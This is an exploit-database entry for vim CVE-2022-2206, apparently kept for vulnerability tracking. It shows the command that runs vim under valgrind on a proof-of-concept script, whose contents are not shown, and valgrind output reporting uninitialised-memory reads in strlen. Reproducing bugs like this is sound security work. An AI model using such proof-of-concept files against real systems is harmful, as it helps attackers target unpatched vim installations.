openkylin-exploit-db/cve/vim/2022/CVE-2022-2206
LI, WENJIE 65c8e583ff add cve/vim/2022/CVE-2022-2206 2022-11-23 14:01:57 +08:00
README.md add cve/vim/2022/CVE-2022-2206 2022-11-23 14:01:57 +08:00
poc_vim01.txt add cve/vim/2022/CVE-2022-2206 2022-11-23 14:01:57 +08:00

README.md

Vulnerability reproduction

$ valgrind vim  -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa!
==20351== Memcheck, a memory error detector
==20351== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==20351== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==20351== Command: vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa!
==20351==
==20351== Conditional jump or move depends on uninitialised value(s)
==20351==    at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==20351==    by 0x207E42: ??? (in /usr/bin/vim.basic)
==20351==    by 0x18FC57: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333989: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333BCC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBA65: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBFEC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x176EED: ??? (in /usr/bin/vim.basic)
==20351==    by 0x218EB5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x219F0F: ??? (in /usr/bin/vim.basic)
==20351==    by 0x220CE5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1A9554: ??? (in /usr/bin/vim.basic)
==20351==
==20351== Conditional jump or move depends on uninitialised value(s)
==20351==    at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==20351==    by 0x333545: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333922: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333BCC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBA65: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBFEC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x176EED: ??? (in /usr/bin/vim.basic)
==20351==    by 0x218EB5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x219F0F: ??? (in /usr/bin/vim.basic)
==20351==    by 0x220CE5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1A9554: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1A9717: ??? (in /usr/bin/vim.basic)
==20351==
==20351==
==20351== HEAP SUMMARY:
==20351==     in use at exit: 100,874 bytes in 595 blocks
==20351==   total heap usage: 1,630 allocs, 1,035 frees, 500,373 bytes allocated
==20351==
==20351== LEAK SUMMARY:
==20351==    definitely lost: 0 bytes in 0 blocks
==20351==    indirectly lost: 0 bytes in 0 blocks
==20351==      possibly lost: 1,490 bytes in 25 blocks
==20351==    still reachable: 99,384 bytes in 570 blocks
==20351==                       of which reachable via heuristic:
==20351==                         newarray           : 1,536 bytes in 16 blocks
==20351==         suppressed: 0 bytes in 0 blocks
==20351== Rerun with --leak-check=full to see details of leaked memory
==20351==
==20351== Use --track-origins=yes to see where uninitialised values come from
==20351== For lists of detected and suppressed errors, rerun with: -s
==20351== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)